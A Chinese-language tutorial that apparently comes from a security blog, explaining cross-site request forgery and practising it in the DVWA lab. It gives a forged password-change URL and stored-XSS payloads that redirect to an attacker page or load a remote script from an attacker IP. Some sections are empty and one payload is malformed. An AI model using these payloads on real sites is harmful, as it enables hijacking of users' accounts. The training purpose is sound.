【安全狐】CSRF原理图及DVWA环境练习
[ CSRF ](Cross-site request forgery)跨站请求伪造,也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。
一、CSRF原理图
- 受害者用密码password正常登陆服务器。
- 服务器通过受害者的身份验证后返回session值。
- 攻击者伪造一个修改密码为456的链接URL并发给受害者。
- 受害者点击修改密码的URL,密码由password改为了456。
- 攻击者等待一段时间后用密码456去尝试登陆。若成功说明已修改对方密码,若失败则说明对方已发现并改回密码。
- 在DVWA环境测试CSRF
- 低级:
(1)发送url明链接
抓包,用来做url链接
192.168.64.132/dvwa/vulnerabilities/csrf/?password_new=456&password_conf=456&Change=Change
受害者在不知情的情况下点击黑客发送的url导致密码被修改为456
尝试用456登陆受害者账户
成功登陆
(2) xss+url链接
http://192.168.64.131/1.html
(3)burp-PoC
存储型xss-重定向+url超链接
<script>window.location='http://192.168.146.132/2ndex.html'</script>
中级:
高级:
<script src=’http=192.168.146.132/a.js’></script>
防御: